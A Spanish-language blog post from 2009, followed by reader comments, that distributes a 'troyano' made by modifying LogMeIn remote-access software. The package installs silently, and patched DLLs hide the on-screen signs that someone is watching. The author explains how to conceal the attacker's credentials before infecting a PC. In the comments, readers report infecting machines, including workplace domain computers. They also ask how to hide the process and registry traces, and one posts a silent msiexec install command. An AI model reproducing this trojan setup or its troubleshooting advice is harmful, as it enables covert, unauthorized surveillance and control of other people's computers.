Troyano con LogMeIn –> Actualización a la versión 4.0.0.966
by Lordblacksuca on Sep.24, 2009, under Descargas, Hacking, Tutoriales
Esta versión corrige algunos bugs de LogMeIn y ademas cambia buena parte del estilo grafico de la pagina.
Si tenias el LogMeIn instalado, ya te habrá pedido que lo actualices, pero si lo tenias patcheado, para que sea invisile, nunca te va a pedir que lo actualices.
Recomiendo actualizar a la nueva version, porque me parece que la version vieja va a dejar de funcionar….(eso es lo que creo.)
Bueno, con respecto al Troyano, corregi todos los problemas encontrados y problemas de compatibilidad de Windows.
En el paquete de descarga, no encontraran el downloader, porque éste funciona perfectamente como está explicado aqui.
En el paquete SI van a encontrar éstos archivos principales:
LMI_Backdoor_by_Lordblacksuca.msi –> este es el instalador de LogMeIn v4.0.0.966 modificado para que la instalación sea totalmente silenciosa.
logmein-patch.exe –> este es un paquete autoextraible donde se encuentran los archivos .dll v4.0.0.966 modificados para hacer que logmein sea totalmente invisible. (la ruta de extraccion de este paquete es la de instalacion de logmein por defecto).
ejecutar.bat –> Ahora solo hay un ejecutable con lineas comentadas. dentro de este archivo, ademas de editar el nombre de usuario y contraseña de tu cuenta con logmein deberas descomentar las lineas segun tu SO. Esta todo explicado ahi dentro.
ADEMAS
originales.rar –> Jejeje, aqui estan los .dll originales del logmein, por si se infectan ustedes mismos, reemplacen estos archivos, asi pueden parar el logmein y luego desinstalarlo desde el panel de control.
taskkill.exe –> Este archivo siempre tiene que estar en la misma carpeta que el ejecutar.bat solo es el taskkill original de un windows XP Professional, pero de esta forma nos aseguramos que los procesos para patchear se terminen correctamente.
Si tienes problemas con el ejecutar.bat es desir que no se te instale, o no se patchee automaticamente, seguramente es por alguna incopatibilidad de los comandos del Fucking Windows. Por favor, deja un comentario con tu problema.
DESCARGA
Bueno, eso es todo por ahora, como siempre, espero comentarios y bugs con respecto al troyano.
Hay muchas formas de usarlo, yo se los doy listo… despues, de lo que haga cada uno con el, bueno, yo no me hago cargo. jejejeje
una ultima aclaracion, recuerda que si vas a infectar una PC, el archivo ejecutar.bat tiene TUS datos de conexion con logmein. DEBES ocultarlo, convertirlo a exe… borrarlo o lo que quieras, pero no lo olvides por ahi!!! Puedes usar el programa ExeScript 3.0 para hacer un .exe solido, y totalmente invisible.
Si estas leyendo ésto y no entiendes nada… te recomiendo que leas todo ESTO desde el principio…
Related posts:
103 Comments for this entry
1 Trackback or Pingback for this entry
Leave a Reply
-
Bienvenido!
Gracias por pasarte, siéntete libre de comentar!
Sigueme en:
Si te gusto mi Blog:
Contador de Visitas
December 16th, 2010 on %H:%M 08Thu, 16 Dec 2010 20:51:50 +000050.
oe men no se si es que estoy haciendo algo mal, pero parece que no se esta aplicando el parche para que sea imvisible; sale el icono al lado del reloj junto con notificaciones y cuando me conecto al ordenador le sale el cartel arriba que dice que esta siendo vigilado por un ordenador remoto :s men sera que estoy haciendo algo mal o se actualizaron algo (aunque sigue siendo la 966) ayuda por favor. es como si no se aplicara el parche
December 16th, 2010 on %H:%M 09Thu, 16 Dec 2010 21:14:06 +000006.
men mis disculpa. el problema estaba enque el windows esta en ingles y por consiguiente el log se instala en program files y el parche en archivos de programa. por eso no se aplicaba, mis disculpas
December 22nd, 2010 on %H:%M 01Wed, 22 Dec 2010 01:36:12 +000012.
Hola
despues de hacer varias pruebas, para los que quieran usar este troyano con version pro o pro trial, aca les dejo el codigo para el bat
msiexec.exe /i LogMeIn.msi /quiet DEPLOYID=s02w7bekurchg6qm2g5o3y7rnw1cq5x1n9zz0z76 INSTALLMETHOD=5 FQDNDESC=1
claramente el DEPLOYID es el ID que entrega logmein.com al momento de elejir la opcion para instalar el archivo LogMeIn.msi en nuestro Host
cualquier cosa me contactan.
saludos.
December 29th, 2010 on %H:%M 08Wed, 29 Dec 2010 08:13:17 +000017.
Buenas, queria comentar una cosa respecto a esto:
Se ejecuta todo muy bien y perfecto el trabajo, me alegro un montón por el autor. Pero lo tienes que ejecutar con el navegador abierto en la página http://www.logmein.com es decir que te tienes que loggear 1º y despues infectar. Por que si no lo haces no aparece el pc remoto. O algo me salio mal. Expliqueme
Muy buen aporte.
January 4th, 2011 on %H:%M 12Tue, 04 Jan 2011 00:05:20 +000020.
No… eso no tiene nada que ver, el troyano es independiente.
January 18th, 2011 on %H:%M 01Tue, 18 Jan 2011 01:05:28 +000028.
Hola primero que nada gracias. y segundo es que el archivo bat no instala el programa. me da los siguientes errores:
ERROR: The Process “LogMeInSystray.exe” not found.
ERROR: The Process “LogMeIn.exe” not found.
estoy trabajando en windows 7 x64.
January 18th, 2011 on %H:%M 01Tue, 18 Jan 2011 01:28:15 +000015.
he probado instalar manuelmente es decir ejecutando el archivo LMI_Backdoor_by_Lordblacksuca.msi, lo he instalado, rellenado los datos que pide (usuario,contraseña pc, e-mail, contraseñ web). tambien instale el logmein-patch.exe pero como lo instalo en una ubicacion diferente los copie y remplaze manualmente en el directorio correcto. pero a al momento de controlar la pc remotamente (desde la web logmein) dio el aviso en una ventana de que “esta computadora esta siendo controlada remotamente”, osea que no me oculta y es detectable, otra cosa es de que ya hay una version mas reciente y el programa avisa que si se desea instalar la version mas reciente.
January 18th, 2011 on %H:%M 01Tue, 18 Jan 2011 01:40:34 +000034.
otra vez yo solo para informar que lo de la actualizacion ya lo solucione, pero lo de la ventana que informa que la pc esta siendo controlada remotamente no se como quitar esa ventana. ah tambien una pregunta mi cuenta es gratuita, ¿por cuanto tiempo puedo utilizar el programa?
January 18th, 2011 on %H:%M 03Tue, 18 Jan 2011 15:09:04 +000004.
La cuenta de logmein free, es gratis y no caduca. El parche funciona bien en 32 bits, tendrias que hacer las modificaciones en los archivos x64
January 29th, 2011 on %H:%M 05Sat, 29 Jan 2011 17:27:19 +000019.
hola men vengo para pedirte si puedes ayudarme en algo. Hay alguna manera, de hacer que se cree una cuenta de usuario en windows xp en silencio? osea si se puede hacer eso con un bat y como por favor si puedes ayudarme te lo agradeceria. gracias de antemano
February 1st, 2011 on %H:%M 11Tue, 01 Feb 2011 23:42:23 +000023.
no te lo sabria decir, pero es probable que si se pueda
June 12th, 2011 on %H:%M 02Sun, 12 Jun 2011 14:30:51 +000051.
hola buenas tardes lordblacksuca primero que todo te felicito por tu troyano ya lo uso hace unos meses al principio tuve algunos problemas los cuales resolví contigo por este medio.
Mi pregunta es sera posible lordblacksuca de crear o hacer algo para que cuando apretemos las combinaciones
de teclas (Ctrl+Alt+Supr) no se vea el proceso de logmein espero y ojala y si se pueda he averiguado sobre
esto pero no he conseguido nada y es muy importante.
July 20th, 2011 on %H:%M 08Wed, 20 Jul 2011 20:51:53 +000053.
hola lord.. antes que todo muchas gracias por los aportes
se que el tuto es algo viejo, pero me gustaria hacer una consulta en caso de que aun estes disponible
resulta que no me instala el soft en windows 7
tiene esto alguna solucion
gracias y saludos
July 20th, 2011 on %H:%M 08Wed, 20 Jul 2011 20:58:42 +000042.
Si anda en windows 7.
August 7th, 2011 on %H:%M 03Sun, 07 Aug 2011 15:41:40 +000040.
hola buenas tardes Lordblacksuca yo tambien he intentado instalarlo en windows 7 y no se puede da una serie de errores seria bueno si esta a tu alcance explicaras como hacerlo con windows 7
August 16th, 2011 on %H:%M 01Tue, 16 Aug 2011 13:55:11 +000011.
Perfecto , solo una pregunta funciona con windows 7 segun lei arriba?
o hay que modificar algo o sirve la misma configuracion del vista?
seria interesante hacerlo con autorun y que el proceso de instalacion no sea visible,de todas formas muchas gracias por la info.
August 16th, 2011 on %H:%M 05Tue, 16 Aug 2011 17:00:59 +000059.
Si, anda en windows 7, lo he probado varias veces en Windos 7 Ultimate y si anda. Y el proceso de instalacion es totalmente invisible.
August 16th, 2011 on %H:%M 02Tue, 16 Aug 2011 14:09:50 +000050.
hay alguna forma de empaquetar todo en un solo .exe?
el taskkill,patch,el.bat etc…
August 16th, 2011 on %H:%M 05Tue, 16 Aug 2011 17:01:35 +000035.
Aca explique como poner todo en un solo exe http://blog.lordblacksuca.com.ar/troyano-indetectable-con-logmein-instalacion-silenciosa/
August 29th, 2011 on %H:%M 01Mon, 29 Aug 2011 01:35:51 +000051.
hola lordblacksuca mi pregunta es la siguiente tengo instalado win7 interprise en ingles y trato de infectarlo pero una vez ejecutada me da un error al remover la clave del registro y se queda tanto visible como en la lista de instalar programas me imagino que esto se debe al idioma ahy algun version del troyano para win7 en ingles gracias
August 29th, 2011 on %H:%M 12Mon, 29 Aug 2011 12:28:56 +000056.
No, tendrias que modificar los archivos para que te ande.
Extrae los archivos del patch, cambia la direccion de extraccion deC:\Archivos de Programa\… a C:\Program Files\ y volvelos a empaquetar.
August 29th, 2011 on %H:%M 01Mon, 29 Aug 2011 13:59:35 +000035.
saludos de nuevo, ok por esa parte se corregiría lo del patch pero y con la parte de que remueva la clave de registro para que no este en agregar y quitar programa y otra cosa podrias recomendar algun programa para descomprimir el patch y modificarlo gracias.
August 29th, 2011 on %H:%M 03Mon, 29 Aug 2011 15:10:29 +000029.
Para borrar esa clave del registro, habria que buscar cual es la entrada en tu windows…
Para el patch, yo use WinRAR.
August 30th, 2011 on %H:%M 01Tue, 30 Aug 2011 01:25:20 +000020.
una ultima pregunta lordblacksuca como podria modificar el software para que se instale en un ruta diferente osea moditificar el install directory si esta dentro de tus posibilidades recomiendame un software para eso y una orientacion sobre que cambiar no me caeria nada mal gracias de nuevo
August 30th, 2011 on %H:%M 01Tue, 30 Aug 2011 01:30:46 +000046.
te pido esta ayuda porque logre infectar el win7 en ingles solo tube que cambiar el patch como me dijiste con winrar y para poder borrar la clave del registro la busque en el registro y la borre de forma manual, por otra parte la victima conoce el logmein por lo que tenia que cambiarle de program files y para esto tube que copiar la carpeta y modificar todas las entradas del registro que genero el programa cuando se instalo. si a alguien le sirve el aporte ahy lo dejo gracias lordblacksuca creo que con la ayuda que te pedi sobre modificar el instalador quedaria completo.
August 30th, 2011 on %H:%M 02Tue, 30 Aug 2011 02:31:08 +000008.
De nada! en estos días me voy a poner a hacer uno mas completo…
September 17th, 2011 on %H:%M 10Sat, 17 Sep 2011 22:00:54 +000054.
Gracias por tus aportes y ya tienes una comunidad que te sigue, estamos a la espera de que quede mas completo y que funcione tambien en win7 64 bits
September 28th, 2011 on %H:%M 07Wed, 28 Sep 2011 19:06:19 +000019.
hola lord, bueno te comento que yo laboro en una institucion, ahi se trabaja con un servidor, y cuando instalo simplemente no se puede, la computadora la cual quiero instalar esta en dominio, bueno espero respondas pronto bye…
September 28th, 2011 on %H:%M 07Wed, 28 Sep 2011 19:08:38 +000038.
Hola, explicame mejor tu problema, lo queres instalar en el servidor o en otra pc? que sistema operativo tiene?
October 5th, 2011 on %H:%M 07Wed, 05 Oct 2011 19:50:21 +000021.
BUENO EN EL TRABAJO DONDE ESTOY TODAS LAS PCs estan conectadas en dominio o concetadas a un servidor proxy. cuando trato de instalar a una de esas PCs no puedo; cuando lo instalo manualmente no me sale la opcion de password de la PC, directo se va A DETALLES DE LA CUENTA DE LOGMEIN, ingreso el correo que esta registrado en logmein y tambien la contraseña, seleccino opcion free, luego siguiente siguiente luego me sale una notificacion donde me dice QUE LA CONTRASEÑA ES UN CORTA, de ahi me saca de la instalacion, no se puede!! espero me haya entendido amigo, o en todo caso a q correo le puedo enviar todas las imagenes del procedimiento y notificaciones que me sale, gracias por anticipado
October 6th, 2011 on %H:%M 09Thu, 06 Oct 2011 21:13:25 +000025.
TIENE SISTEMA OPERATIVO WINDOW 7 Y TAMBIEN XP, NINGUAN DE LAS DOS SE PUEDE INSTALAR, ESTAN EN DOMINIO COMO TE EXPLIQUE LINEAS ARRIBA
October 6th, 2011 on %H:%M 09Thu, 06 Oct 2011 21:14:49 +000049.
No probaste poner una contraseña mas larga???
October 11th, 2011 on %H:%M 10Tue, 11 Oct 2011 10:12:16 +000016.
la contraseña q puse tiene 10 digitos,
December 28th, 2011 on %H:%M 07Wed, 28 Dec 2011 19:01:03 +000003.
Hola LordBlacksuca, excelente tu página. Te consulto: como hago para que el resource hack no me tire “cannot rename original file saving cancelled” en Win Vista y 7. No logro guardar los cambios y la ventanita del amor arriba y el ícono abajo siguen, o sea no me sirve. Te agradecería una solución si es que existe!
January 13th, 2012 on %H:%M 12Fri, 13 Jan 2012 12:26:32 +000032.
lord me aparece una ventana dicieoyndome delatando que estoy conectado remotamente como se puede correigir?
February 11th, 2012 on %H:%M 03Sat, 11 Feb 2012 15:44:43 +000043.
Seguramente, no se aplicó bien el parche